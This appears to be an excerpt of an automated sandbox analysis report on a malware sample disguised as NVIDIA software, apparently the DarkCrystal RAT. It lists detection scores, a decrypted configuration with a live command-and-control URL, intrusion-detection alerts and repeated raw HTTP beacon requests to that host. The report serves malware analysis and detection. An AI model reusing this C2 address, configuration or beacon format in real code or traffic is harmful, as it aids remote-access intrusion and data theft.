                                  Source: C:\Users\user\Desktop\snUoPbCy.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\ukwwlbRt.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\xYhnoKfH.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\zwfUdEOY.logReversingLabs: Detection: 37%
                                  Source: NVIDIAShare.exe.bin.exeReversingLabs: Detection: 60%
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                  Source: C:\Users\user\Desktop\DnVLkBOS.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\AOEnQqnj.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeJoe Sandbox ML: detected
                                  Source: NVIDIAShare.exe.bin.exeJoe Sandbox ML: detected
                                  Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["P2R1bmZ6NLngSNbcmEEcHQZQHBgi73VNdFCXiX4uz3wStXve5Ce0uSK9cAtaG18TzaDNLE3PJTmNdHhtPBm5ZfcK5D4hneo85ddSUiS1IOqbp6fVcAKFOD4T82RIJVlp","b11c43509f862efb5e6ac76246280a4e4f539faad6021ed5aa3ed20238541750","1","MZLFFF","","5","2","WyIyIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                  Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://bibaprog.ru/","ProviderEternallineauthmultiTrackwordpressWpDownloads"]]
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NVIDIAShare.exe.bin.exe
                                  Source: Binary string: System.Windows.Forms.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 7..pDb source: NVIDIA Container.exe, 00000005.00000002.2129474262.00007FF8493E0000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0100A69B
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0102B348 FindFirstFileExA,0_2_0102B348
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0101C220
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F21FD6h12_2_00007FF848F21DCE
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch12_2_00007FF848F77288
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch12_2_00007FF848F772C8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch12_2_00007FF848F7794D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF8490E2096h12_2_00007FF8490E2178
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F21FD6h14_2_00007FF848F21DCE
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F21FD6h19_2_00007FF848F21DCE
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch26_2_00007FF848F77288
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch26_2_00007FF848F772C8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F77B4Ch26_2_00007FF848F7794D
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF848F21FD6h26_2_00007FF848F21DCE
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 4x nop then jmp 00007FF8490E2096h26_2_00007FF8490E2178

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49745 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49796 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49872 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49919 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49986 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49995 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49984 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49988 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49993 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49998 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49983 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49996 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49992 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49997 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49994 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49987 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49989 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49991 -> 104.21.64.1:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49985 -> 104.21.64.1:80
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: bibaprog.ru
                                  Source: unknownHTTP traffic detected: POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: bibaprog.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LISi%2FyKNQHOROXN0SwqwNEZf6NVi2PaPrD8%2BkzPc6flTPWKpvYWWjiTU8nG%2BuUkWaHPJPMZUHGfYFnXaNmYJtbYhUIGDUOIjLozIkFwX4eGbTLAVPNVZ8I%2FY6rfepw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156fb35dae4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3400&min_rtt=1691&rtt_var=4052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=95027&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRWxU10oe72zy83fkiUiOToSFQ8f7imE45wdMCVE31EHtK7R0EONs11BCWTsUVH6nsKRaUWjIdKio9PDE83nc0m2imGuBKJdC95V6n%2BisQzkFOjf%2B0AQ2XtOcUb3TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156ffe0c724414-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3236&min_rtt=1663&rtt_var=3771&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=102427&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:37:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a23IktWnlu2tWtgHtkKgFX1IL80EvtYftf9uzgV4rW24X2Rwb8J1pqmRQ8whQbujtrA2lrDxRbDNHLmcmRLN%2BWUb7BWmIrn%2Bb3HH65GvS%2B8VAW7wQ%2BwiZiNRElkedw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015702fb9108ca1-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1970&rtt_var=5376&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=71146&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
